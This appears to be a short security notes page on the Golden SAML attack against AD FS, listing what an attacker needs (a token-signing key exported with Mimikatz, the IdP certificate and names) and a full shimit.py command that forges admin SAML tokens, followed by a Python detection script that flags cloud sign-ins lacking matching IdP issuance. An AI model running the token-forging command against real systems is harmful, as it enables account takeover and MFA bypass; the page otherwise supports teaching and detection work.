# Golden SAML Attack

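Using the extracted information, the tool generates a forged SAML token as an arbitrary user, which can then be used to authenticate to Office 365 without knowing that user's password. This attack also bypasses any MFA requirements.

Requirements:

- Token-signing private key (exported from the Personal store using Mimikatz)
- IdP public certificate
- IdP name
- Role name (the role to assume)

```
>python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
>python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
```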
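Because a forged token never passes through the IdP, a service-provider sign-in has no matching token-issuance record on the AD FS side. The following is an added detection example, not part of the original page or of the tool: it correlates the two log sources and reports sign-ins the IdP never issued. The record layout, the `alice`/`bob` users, the timestamps and the 5-minute window are assumptions, and the sample data is constructed.

```python
from datetime import datetime, timedelta

# Constructed sample records, already normalized from two log sources.
# The field names (time, user, role) are assumptions of this example.
IDP_ISSUED = [  # AD FS token-issuance audit events
    {"time": "2024-05-01T09:00:05", "user": "alice@domain.com"},
    {"time": "2024-05-01T09:30:10", "user": "bob@domain.com"},
]
SP_LOGINS = [  # service-provider SAML sign-ins, e.g. CloudTrail AssumeRoleWithSAML
    {"time": "2024-05-01T09:00:07", "user": "alice@domain.com", "role": "ADFS-monitor"},
    {"time": "2024-05-01T09:30:12", "user": "bob@domain.com", "role": "ADFS-monitor"},
    {"time": "2024-05-01T11:15:00", "user": "admin@domain.com", "role": "ADFS-admin"},
    {"time": "2024-05-01T13:00:00", "user": "alice@domain.com", "role": "ADFS-admin"},
]

CLOCK_SKEW = timedelta(seconds=30)  # tolerated drift between the two log sources


def _ts(value):
    return datetime.fromisoformat(value)


def unmatched_sp_logins(sp_logins, idp_issued, window=timedelta(minutes=5)):
    """Return SP sign-ins with no IdP issuance for the same user shortly before."""
    issued = {}
    for event in idp_issued:
        issued.setdefault(event["user"].lower(), []).append(_ts(event["time"]))

    suspicious = []
    for login in sp_logins:
        login_time = _ts(login["time"])
        candidates = issued.get(login["user"].lower(), [])
        # A legitimate sign-in follows an issuance by at most `window`.
        matched = any(-CLOCK_SKEW <= login_time - t <= window for t in candidates)
        if not matched:
            suspicious.append(login)
    return suspicious


if __name__ == "__main__":
    for hit in unmatched_sp_logins(SP_LOGINS, IDP_ISSUED):
        print("no matching IdP issuance:", hit["time"], hit["user"], hit["role"])
```

The check only works if AD FS auditing is enabled and both log sources are retained for the same period; a sign-in is also flagged when the user's last issuance is older than the window, which catches reuse of a user who authenticated legitimately earlier in the day.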

